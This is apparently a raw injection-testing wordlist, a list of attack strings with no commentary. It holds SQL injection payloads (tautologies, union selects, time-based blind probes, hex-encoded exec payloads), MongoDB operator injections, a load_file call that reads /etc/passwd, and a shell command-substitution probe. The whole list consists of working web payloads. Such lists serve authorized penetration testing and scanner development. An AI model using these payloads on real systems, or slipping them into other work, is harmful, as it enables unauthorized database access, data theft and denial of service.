 --
!
!
"
#
&
&
'
'
' -- 
'); --
'; --
'\"
(
(
)
)
*/*
*/*
*|
*|
-
--
--';
/
/
//
//
//*
//*
; --
<>"'%;)(&+
<>"'%;)(&+
?
|
|
' } ], $comment:'successful MongoDB injection'
{$gt: ''}
[$ne]=1
{ $ne: 1 }
', $or: [ {}, { 'a':'a
', $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
0
031003000270000
0 or 1=1
0 or 1=1
0x730065006c0065006300740020004000400076006500 ...
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
0x770061006900740066006F0072002000640065006C00 ...
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0x77616974666F722064656C61792027303A303A313027 ...
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1, $where: '1 == 1'
|| 1==1
1'1
1\'1
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1' and non_existant_table = '1
1 and user_name() = 'dbo'
1 exec sp_ (or exec xp_)
1;(load_file(char(47,101,116,99,47,112,97,115, ...
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
1 or 1=1
1'or'1'='1
1' or '1'='1
1or1=1
1 or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1) or pg_sleep(5)--
1)) or pg_sleep(5)--
1 or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
1 or sleep(5)#
1) or sleep(5)#
1)) or sleep(5)#
1 or sleep(__TIME__)#
1) or sleep(__TIME__)#
1)) or sleep(__TIME__)#
1;SELECT%20*
1;SELECT%20*
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
1 waitfor delay '0:0:10'--
'%20--
'%20;
=%20'
=%20--
=%20;
%20$(sleep%2050)
%20$(sleep%2050)
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
%20or%20''='
